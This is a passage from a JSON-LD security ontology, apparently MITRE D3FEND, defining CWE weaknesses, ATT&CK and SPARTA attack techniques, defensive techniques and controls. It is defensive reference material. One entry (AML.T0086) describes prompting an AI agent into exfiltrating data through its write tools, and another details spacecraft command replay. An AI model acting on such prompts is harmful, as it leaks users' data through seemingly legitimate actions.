      "d3f:definition": "The product performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared.",
      "rdfs:label": "Comparison of Incompatible Types",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:CWE-210",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-210",
      "d3f:definition": "The product identifies an error condition and creates its own diagnostic or error messages that contain sensitive information.",
      "rdfs:label": "Self-generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:T1558.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.002",
      "d3f:definition": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)",
      "rdfs:label": "Silver Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:CWE-48",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-48",
      "d3f:definition": "The product accepts path input in the form of internal space ('file(SPACE)name') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file name' (Internal Whitespace)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:AML.T0086",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0086",
      "d3f:definition": "Adversaries may use prompts to invoke an agent's tool capable of performing write operations to exfiltrate data. Sensitive information can be encoded into the tool's input parameters and transmitted as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos.",
      "rdfs:label": "Exfiltration via AI Agent Tool Invocation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0086"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via AI Agent Tool Invocation"
    },
    {
      "@id": "d3f:T1036.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.006",
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.",
      "rdfs:label": "Space after Filename",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N758ddcda69cb4df0b04f124aba2a015f"
        }
      ]
    },
    {
      "@id": "_:N758ddcda69cb4df0b04f124aba2a015f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Credential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "A credential is a physical/tangible object, a piece of knowledge, or a facet of a person's physical being that enables an individual access to a given physical facility or computer-based information system. Typically, credentials can be something a person knows (such as a number or PIN), something they have (such as an access badge), something they are (such as a biometric feature), something they do (measurable behavioral patterns) or some combination of these items. This is known as multi-factor authentication. The typical credential is an access card or key-fob, and newer software can also turn users' smartphones into access devices.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Access_control#Credential"
      },
      "rdfs:label": "Credential",
      "rdfs:seeAlso": {
        "@id": "dbr:Access_control"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N36f1390cfa74483a8291fc75258783f7"
        }
      ]
    },
    {
      "@id": "_:N36f1390cfa74483a8291fc75258783f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1027.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.001",
      "d3f:definition": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.",
      "d3f:modifies": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Binary Padding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:Na449a86f629e44f6bf245ec91dd59d46"
        }
      ]
    },
    {
      "@id": "_:Na449a86f629e44f6bf245ec91dd59d46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:CWE-436",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-436",
      "d3f:definition": "Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.",
      "rdfs:label": "Interpretation Conflict",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-435"
      }
    },
    {
      "@id": "d3f:EX-0001.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0001.01",
      "d3f:definition": "Threat actors may resend authentic-looking telecommands that were previously accepted by the spacecraft. Captures may include whole command PDUs with framing, CRC/MAC, counters, and timetags intact, or they may be reconstructed from operator tooling and procedure logs. When timing, counters, and mode preconditions align, the replayed packet can cause the same effect: toggling relays, initiating safing or recovery scripts, adjusting tables, commanding momentum dumps, or scheduling delta-v events. Even when outright execution fails, repeated “near-miss” injections can map acceptance windows, rate/size limits, and interlocks by observing the spacecraft’s acknowledgments and state changes. At scale, streams of valid-but-stale commands can congest command queues, delay legitimate activity, or trigger nuisance FDIR responses.",
      "d3f:produces": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "Command Packets - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0001"
        },
        {
          "@id": "_:N49436220e1f64c158f30feaa3d923ade"
        }
      ],
      "skos:prefLabel": "Command Packets"
    },
    {
      "@id": "_:N49436220e1f64c158f30feaa3d923ade",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:RegexMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RM",
      "d3f:definition": "Regular expression matching is type of partial string matching using a regular expression, which is a sequence of characters that specifies a match pattern in text.",
      "d3f:kb-article": "## How it works\n\nA regular expression (shortened as regex or regexp) is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for \"find\" or \"find and replace\" operations on strings, or for input validation.\n\n## Key Test Considerations\n\n- **External review of regular expressions**: Regular expressions used in rules should be reviewed by a independent developer SME.  Regex testing and visualization tools may be used to aid this review.  Back-tests for failure modes identified during the review shoud be developed.  Regular expressions are easy to get wrong and may appear to work on limited tests; small mistakes can lead to unintended misses and matches.]\n\n- **Processing Performance Review**: Review of resource-intensive rules may be necessary if system performance degraded.  Look for cases of “exponential backtracking”  Some regexes are computationally expensive.\n\n## References\n1. Regular expression. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Regular_expression).\n2. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm).",
      "d3f:synonym": [
        "Regex",
        "Regexp"
      ],
      "rdfs:label": "Regex Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1584.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.002",
      "d3f:definition": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.",
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:control-name": "Malicious Code Protection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-3"
    },
    {
      "@id": "d3f:CWE-768",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-768",
      "d3f:definition": "The product contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring.",
      "rdfs:label": "Incorrect Short Circuit Evaluation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:ApplicationStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an application transitions from an inactive state to an active state, initializing its resources and becoming operational for user interaction or automated processes.",
      "rdfs:label": "Application Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N1f17fc98dcb64756b38f7506d12c6e31"
        }
      ]
    },
    {
      "@id": "_:N1f17fc98dcb64756b38f7506d12c6e31",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:CWE-620",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-620",
      "d3f:definition": "When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.",
      "rdfs:label": "Unverified Password Change",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-SecuritySystemWithMethodologyForInterprocessCommunicationControl_CheckPointSoftwareTechInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20040199763"
      },
      "d3f:kb-abstract": "A security system with methodology for interprocess communication control is described. In one embodiment, a method for controlling interprocess communication is provided that includes steps of: defining rules indicating which system services a given application can invoke; trapping an attempt by a particular application to invoke a particular system service; identifying the particular application that is attempting to invoke the particular system service; and based on identity of the particular application and on the rules indicating which system services a given application can invoke, blocking the attempt when the rules indicate that the particular application cannot invoke the particular system service.",
      "d3f:kb-author": "Gregor Freund",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring interprocess communications to prevent malicious applications from requesting system services. API calls are monitored to detect malicious applications attempting to open a communication channel (port) to access system services or sending messages to other applications using user32 API functions. These requests are examined against an external rules engine or whitelist, matches deny or block access and produce an error message such as connection refused or service not available.",
      "d3f:kb-organization": "Check Point Software Tech Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Security System with Methodology for Interprocess Communication Control",
      "rdfs:label": "Reference - Security System with Methodology for Interprocess Communication Control - Check Point Software Tech Inc"
    },
    {
      "@id": "d3f:T1061",
      "@type": "owl:Class",
      "d3f:attack-id": "T1061",
      "d3f:definition": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**",
      "rdfs:label": "Graphical User Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-88",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-88",
      "d3f:definition": "The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.",
      "rdfs:label": "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:GetSystemConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:reads": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Get System Config Value",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexa"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigSystemCall"
        },
        {
          "@id": "_:N3caf1fbe36f64e2ba15a736d56572a8f"
        }
      ]
    },
    {
      "@id": "_:N3caf1fbe36f64e2ba15a736d56572a8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:JavascriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Javascript File"
    },
    {
      "@id": "d3f:VideoInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Video input devices are used to digitize images or video from the outside world into the computer. The information can be stored in a multitude of formats depending on the user's requirement.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Input_device#Video_input_devices"
      },
      "rdfs:label": "Video Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens a handle to process object and sets the access rights to this object.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-ntopenprocess"
      },
      "rdfs:label": "Windows NtOpenProcess",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceProcess"
      }
    },
    {
      "@id": "d3f:InternetNetwork",
      "@type": "owl:Class",
      "d3f:definition": "A network of multiple, connected networks. Internetworking is the practice of connecting a computer network with other networks through the use of gateways that provide a common method of routing information packets between the networks. The resulting system of interconnected networks are called an internetwork, or simply an internet. Internetworking is a combination of the words inter (\"between\") and networking; not internet-working or international-network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:label": "Internet Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": [
        "Interconnected Network",
        "Internet",
        "Internetwork"
      ]
    },
    {
      "@id": "d3f:RAM",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:MemoryExtent"
      },
      "d3f:definition": "Random-access memory (RAM) is a form of computer memory that can be read and changed in any order, typically used to store working data and machine code.",
      "d3f:synonym": "Random-access Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Random-access_memory"
      },
      "rdfs:label": "RAM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
          "@id": "_:Nacd397129b344eadb00a8b2396a625d6"
        }
      ]
    },
    {
      "@id": "_:Nacd397129b344eadb00a8b2396a625d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:ForwardResolutionDomainDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ForwardResolutionDomainDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-FRDDL",
      "d3f:definition": "Blocking a lookup based on the query's domain name value.",
      "d3f:kb-article": "## How it works\n\nPolicies are created that filter DNS queries using fully qualified domain name (FQDN) of record in the query. A DNS policy can be created for blocking DNS queries from FQDNs that have been identified as unauthorized.\n\n## Considerations\n\nContinuous maintenance of unauthorized domain lists is needed to keep up to date as updates occur.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Forward Resolution Domain Blacklisting",
      "rdfs:label": "Forward Resolution Domain Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:N6c34597cd6724c448748268826a60f6f"
        }
      ]
    },
    {
      "@id": "_:N6c34597cd6724c448748268826a60f6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1098",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1098",
      "d3f:definition": "The code contains a data element with a pointer that does not have an associated copy or constructor method.",
      "rdfs:label": "Data Element containing Pointer Item without Proper Copy Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:PlatformMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformMonitoring"
      ],
      "d3f:d3fend-id": "D3-PM",
      "d3f:definition": "Monitoring platform components such as operating systems software, hardware devices, or firmware.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "Platform monitoring consists of the analysis and monitoring of system level devices and low-level components, including hardware devices, to detect unauthorized modifications or suspicious activity.\n\nMonitored platform components includes system files and embedded devices such as:\n\n * Kernel software modules\n * Boot process code and load logic\n * Operating system components and device files\n * System libraries and dynamically loaded files\n * Hardware device drivers\n * Embedded firmware devices",
      "rdfs:label": "Platform Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N6f523ce2112848b78a6cece61f373463"
        }
      ]
    },
    {
      "@id": "_:N6f523ce2112848b78a6cece61f373463",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:T1179",
      "@type": "owl:Class",
      "d3f:attack-id": "T1179",
      "d3f:definition": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1056.004",
      "rdfs:label": "Hooking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1056.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:DigitalImage",
      "@type": "owl:Class",
      "d3f:definition": "A digital image is a pixel-based visual representation stored in formats like JPEG or PNG, used for various digital applications.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_image",
      "rdfs:label": "Digital Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:OTModifyDeviceOperatingModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Modifies the running state of an application or program on a device.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Modify Device Operating Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommand"
        },
        {
          "@id": "_:N13bacdaaf0ce418fab87ca71b2d759b7"
        }
      ]
    },
    {
      "@id": "_:N13bacdaaf0ce418fab87ca71b2d759b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Thread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Thread is the smallest unit of execution within a process, representing a sequence of instructions that can be scheduled and executed independently by the operating system.",
      "rdfs:label": "Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:AccessGrantedEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event signifying that access to a resource has been authorized and successfully enforced, allowing the requesting agent to perform specified operations based on the access control policies.",
      "rdfs:label": "Access Granted Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessMediationEvent"
      }
    },
    {
      "@id": "d3f:T1417.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417.001",
      "d3f:definition": "Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.",
      "rdfs:label": "Keylogging - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1417"
      },
      "skos:prefLabel": "Keylogging"
    },
    {
      "@id": "d3f:ApplicationStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the cessation of an application’s operations, transitioning it to an inactive state and releasing any allocated resources.",
      "rdfs:label": "Application Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Nf4ef39cb228a418e9ba4647912aa20e4"
        }
      ]
    },
    {
      "@id": "_:Nf4ef39cb228a418e9ba4647912aa20e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStartEvent"
      }
    },
    {
      "@id": "d3f:DS0021",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Persona (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1636",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s `Info.plist` file.",
      "rdfs:label": "Protected User Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Protected User Data"
    },
    {
      "@id": "d3f:CWE-89",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-89",
      "d3f:definition": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.",
      "d3f:synonym": [
        "SQL injection",
        "SQLi"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-943"
        },
        {
          "@id": "_:N8c620ef9862d47b1b895acc83ce6c96e"
        }
      ]
    },
    {
      "@id": "_:N8c620ef9862d47b1b895acc83ce6c96e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CWE-476",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-476",
      "d3f:definition": "The product dereferences a pointer that it expects to be valid but is NULL.",
      "d3f:synonym": [
        "NPD",
        "NPE",
        "nil pointer dereference",
        "null deref"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-710"
        },
        {
          "@id": "d3f:CWE-754"
        },
        {
          "@id": "_:N2212930d7ca24e39952027bf31e0623a"
        }
      ]
    },
    {
      "@id": "_:N2212930d7ca24e39952027bf31e0623a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:ATTACKThing",
      "@type": "owl:Class",
      "d3f:definition": "ATTACK things are concepts defined in the ATT&CK Framework.",
      "rdfs:label": "ATTACK Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:CWE-201",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-201",
      "d3f:definition": "The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.",
      "rdfs:label": "Insertion of Sensitive Information Into Sent Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1517",
      "@type": "owl:Class",
      "d3f:attack-id": "T1517",
      "d3f:definition": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)",
      "rdfs:label": "Access Notifications - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Access Notifications"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Flow Control of Encrypted Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(4)"
    },
    {
      "@id": "d3f:CWE-496",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-496",
      "d3f:definition": "Assigning public data to a private array is equivalent to giving public access to the array.",
      "rdfs:label": "Public Data Assigned to Private Array-Typed Field",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T0850",
      "@type": "owl:Class",
      "d3f:attack-id": "T0850",
      "d3f:definition": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Role Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Role Identification"
    },
    {
      "@id": "d3f:CCI-000017_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically disables inactive accounts after an organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000017"
    },
    {
      "@id": "d3f:OutboundTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OutboundTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-OTF",
      "d3f:definition": "Restricting network traffic originating from a private host or enclave destined towards untrusted networks.",
      "d3f:filters": {
        "@id": "d3f:OutboundNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\n\nOutbound traffic, in this context, is network traffic originating from a private host or enclave destined towards untrusted networks.\nFor example:\n\n* An enterprise desktop intranet user connecting to www.example.com\n* An internal mail server connecting to an external mail server, mail.example.com\n\nFiltering is commonly implemented as firewall rulesets to limit outbound traffic permitted to egress a host or network. Firewalls are deployed either directly on hosts through kernel level software implementations or installed in-line directly on network links. There are benefits and disadvantages to each approach.\n\nThere are various strategies for developing filtering rulesets:\n\n* Block everything by default\n* Limit destination hosts\n* Limit destination transport or application protocols\n* Restrict content outbound (Ex. strings formatted as social security numbers, or proprietary data)\n\n## Considerations\n* Dynamic IP assignment creates challenges for Outbound Traffic Filtering because users are not necessarily associated with the same IP address. This can be addressed by linking IP address management information with the filtering logic.\n* Connections using non-standard transport layer ports may circumvent outbound traffic filtering technology which does not detect 